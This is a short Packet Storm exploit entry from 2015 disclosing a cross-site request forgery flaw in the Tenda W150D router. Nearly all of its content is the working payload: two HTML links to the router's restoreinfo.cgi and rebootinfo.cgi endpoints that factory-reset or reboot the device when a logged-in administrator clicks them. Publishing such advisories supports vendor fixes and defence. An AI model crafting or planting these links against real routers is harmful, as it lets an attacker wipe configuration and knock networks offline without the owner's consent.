Tenda W150D Cross Site Request Forgery

2015-01-10T00:00:00
ID PACKETSTORM:129878
Type packetstorm
Reporter Hadji Samir
Modified 2015-01-10T00:00:00

Description

                                        
                                            `# Exploit Title: Tenda W150D Router - CSRF Vulnerability   
# Date: 2015-01-10  
# Exploit Author: Hadji Samir s-dz@hotmail.fr  
# Vendor Homepage: http://tenda.com.cn/  
# Software Link: http://tenda.cn/tendacn/Product/show.aspx?productid=389  
# Version: 1.0.0   
# Thanks: Hamama Alzir (fb)   
  
When the administrator login, click on the link below " restore default the Router"  
  
<a href="http://192.168.1.1/restoreinfo.cgi">restore default</a>  
  
When the administrator login, click on the link below " the device will reboot"  
  
<a href="http://192.168.1.1/rebootinfo.cgi">reboot</a>   
  
`